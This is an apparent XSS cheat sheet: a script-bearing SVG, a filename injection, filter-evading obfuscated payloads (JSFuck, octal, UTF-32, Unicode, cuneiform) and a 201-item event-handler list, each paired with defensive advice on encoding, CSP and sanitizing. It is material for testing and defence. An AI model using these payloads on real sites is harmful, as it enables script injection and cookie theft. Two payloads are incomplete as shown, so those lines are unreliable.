Cross-Site Scripting (XSS)

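XSS inside SVG File

An SVG is an XML document and may carry its own <script>. The script runs only when the browser renders the SVG as a document (opened directly, or embedded via <iframe>/<object>/<embed>), not when it is loaded through <img>. For user uploads, serve the file from a separate origin or with Content-Disposition: attachment, and sanitize or rasterize SVGs before storing them.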

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

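XSS in filename

The filename of an upload is attacker-controlled input. This name executes wherever the application writes it into HTML without output encoding (file lists, error messages, admin panels); HTML-encode filenames on output or store uploads under server-generated names.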

"><img src=x onerror=prompt(1).jpg

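Weird Payloads

Encodings and obfuscations that keyword blocklists fail to match. They are useful for checking that a filter decodes and normalizes input before inspecting it; context-aware output encoding and a strict Content-Security-Policy do not depend on recognizing any of them.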

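//XSS using eval() and fromCharCode - the char codes spell alert('document.cookie'); as shown there is no eval() call, so that text is passed to alert() as a string rather than executed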
<img onload="javascript:alert(String.fromCharCode(97,108,101,114,116,40,39,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,39,41,59))">
//Octal encoding - the escapes decode to <svg onload=alert(1)>
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
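//UTF-32 - an <svg/onload=alert()> tag padded with NUL bytes; it is only parsed as markup if the response is decoded as UTF-32, so always send an explicit charset=utf-8 (the Encoding Standard followed by current browsers has no UTF-32 decoder)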
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
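//JSFuck - JavaScript built from only the characters []()!+ ; this one evaluates to alert(1) without containing a single letter or digit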
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
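//XSS in hidden input - Use CTRL+SHIFT+X to trigger the onclick event (needs user interaction; the accesskey modifier combination differs by browser and OS, e.g. ALT+SHIFT+X)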
<input type="hidden" accesskey="X" onclick="alert(1)">
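//Unicode 'ſ' (U+017F, Latin long s) character - browsers do not treat it as 's'; it only becomes a script tag if the application upper-cases or compatibility-normalizes (NFKC/NFKD) input after its filter has run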
<ſcript/src=//127.0.0.1/xss.js>
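//Katana payload (the non-ASCII identifier characters appear to have been lost when this page was extracted; the line below is incomplete as shown)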
javascript:([,,,,,]=[]+{},[,,,,,,,,,,]=[!!]+!+.)[=++++++++++][](+++++'(-~ウ)')()
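//Lontara payload (the non-ASCII identifier characters appear to have been lost when this page was extracted; the line below is incomplete as shown)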
='',=!+,=!+,=+{},=[++],=[=],=+++,=[+],[+=[]+(.+)[]+[]+++[]+++[]+][]([]+[]+[]+++"(ᨆ)")()
//Cuneiform-alphabet payload - every identifier is a cuneiform code point, so nothing in it matches an ASCII keyword filter
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
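//Typical iframe - javascript: URL in src; it is treated as inline script, so a Content-Security-Policy without 'unsafe-inline' blocks it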
<iframe src=javascript:alert(1)>

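Event handlers

Attribute names that accept script, including legacy and vendor-prefixed ones. The list is not exhaustive and browsers keep adding handlers, so a sanitizer should allowlist the attributes it permits rather than blocklist these names.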

1
"onabort",
2
"onactivate",
3
"onafterprint",
4
"onafterscriptexecute",
5
"onafterupdate",
6
"onanimationend",
7
"onanimationiteration",
8
"onanimationstart",
9
"onariarequest",
10
"onautocomplete",
11
"onautocompleteerror",
12
"onbeforeactivate",
13
"onbeforecopy",
14
"onbeforecut",
15
"onbeforedeactivate",
16
"onbeforeeditfocus",
17
"onbeforepaste",
18
"onbeforeprint",
19
"onbeforescriptexecute",
20
"onbeforeunload",
21
"onbeforeupdate",
22
"onbegin",
23
"onblur",
24
"onbounce",
25
"oncancel",
26
"oncanplay",
27
"oncanplaythrough",
28
"oncellchange",
29
"onchange",
30
"onclick",
31
"onclose",
32
"oncommand",
33
"oncompassneedscalibration",
34
"oncontextmenu",
35
"oncontrolselect",
36
"oncopy",
37
"oncuechange",
38
"oncut",
39
"ondataavailable",
40
"ondatasetchanged",
41
"ondatasetcomplete",
42
"ondblclick",
43
"ondeactivate",
44
"ondevicelight",
45
"ondevicemotion",
46
"ondeviceorientation",
47
"ondeviceproximity",
48
"ondrag",
49
"ondragdrop",
50
"ondragend",
51
"ondragenter",
52
"ondragleave",
53
"ondragover",
54
"ondragstart",
55
"ondrop",
56
"ondurationchange",
57
"onemptied",
58
"onend",
59
"onended",
60
"onerror",
61
"onerrorupdate",
62
"onexit",
63
"onfilterchange",
64
"onfinish",
65
"onfocus",
66
"onfocusin",
67
"onfocusout",
68
"onformchange",
69
"onforminput",
70
"onfullscreenchange",
71
"onfullscreenerror",
72
"ongotpointercapture",
73
"onhashchange",
74
"onhelp",
75
"oninput",
76
"oninvalid",
77
"onkeydown",
78
"onkeypress",
79
"onkeyup",
80
"onlanguagechange",
81
"onlayoutcomplete",
82
"onload",
83
"onloadeddata",
84
"onloadedmetadata",
85
"onloadstart",
86
"onlosecapture",
87
"onlostpointercapture",
88
"onmediacomplete",
89
"onmediaerror",
90
"onmessage",
91
"onmousedown",
92
"onmouseenter",
93
"onmouseleave",
94
"onmousemove",
95
"onmouseout",
96
"onmouseover",
97
"onmouseup",
98
"onmousewheel",
99
"onmove",
100
"onmoveend",
101
"onmovestart",
102
"onmozfullscreenchange",
103
"onmozfullscreenerror",
104
"onmozpointerlockchange",
105
"onmozpointerlockerror",
106
"onmscontentzoom",
107
"onmsfullscreenchange",
108
"onmsfullscreenerror",
109
"onmsgesturechange",
110
"onmsgesturedoubletap",
111
"onmsgestureend",
112
"onmsgesturehold",
113
"onmsgesturestart",
114
"onmsgesturetap",
115
"onmsgotpointercapture",
116
"onmsinertiastart",
117
"onmslostpointercapture",
118
"onmsmanipulationstatechanged",
119
"onmspointercancel",
120
"onmspointerdown",
121
"onmspointerenter",
122
"onmspointerleave",
123
"onmspointermove",
124
"onmspointerout",
125
"onmspointerover",
126
"onmspointerup",
127
"onmssitemodejumplistitemremoved",
128
"onmsthumbnailclick",
129
"onoffline",
130
"ononline",
131
"onoutofsync",
132
"onpage",
133
"onpagehide",
134
"onpageshow",
135
"onpaste",
136
"onpause",
137
"onplay",
138
"onplaying",
139
"onpointercancel",
140
"onpointerdown",
141
"onpointerenter",
142
"onpointerleave",
143
"onpointerlockchange",
144
"onpointerlockerror",
145
"onpointermove",
146
"onpointerout",
147
"onpointerover",
148
"onpointerup",
149
"onpopstate",
150
"onprogress",
151
"onpropertychange",
152
"onratechange",
153
"onreadystatechange",
154
"onreceived",
155
"onrepeat",
156
"onreset",
157
"onresize",
158
"onresizeend",
159
"onresizestart",
160
"onresume",
161
"onreverse",
162
"onrowdelete",
163
"onrowenter",
164
"onrowexit",
165
"onrowinserted",
166
"onrowsdelete",
167
"onrowsinserted",
168
"onscroll",
169
"onsearch",
170
"onseek",
171
"onseeked",
172
"onseeking",
173
"onselect",
174
"onselectionchange",
175
"onselectstart",
176
"onshow",
177
"onstalled",
178
"onstart",
179
"onstop",
180
"onstorage",
181
"onstoragecommit",
182
"onsubmit",
183
"onsuspend",
184
"onsynchrestored",
185
"ontimeerror",
186
"ontimeupdate",
187
"ontoggle",
188
"ontrackchange",
189
"ontransitionend",
190
"onunload",
191
"onurlflip",
192
"onuserproximity",
193
"onvolumechange",
194
"onwaiting",
195
"onwebkitanimationend",
196
"onwebkitanimationiteration",
197
"onwebkitanimationstart",
198
"onwebkitfullscreenchange",
199
"onwebkitfullscreenerror",
200
"onwebkittransitionend",
201
"onwheel"

References

XSS Hunter
Platform to hunt XSS vulnerabilities
GitHub - vkbiu/KNR-XSS-Payloads: Payloads For XSS
GitHub
XSS Payloads Repository
GitHub - terjanq/Tiny-XSS-Payloads: A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me
GitHub
Tiny XSS Payloads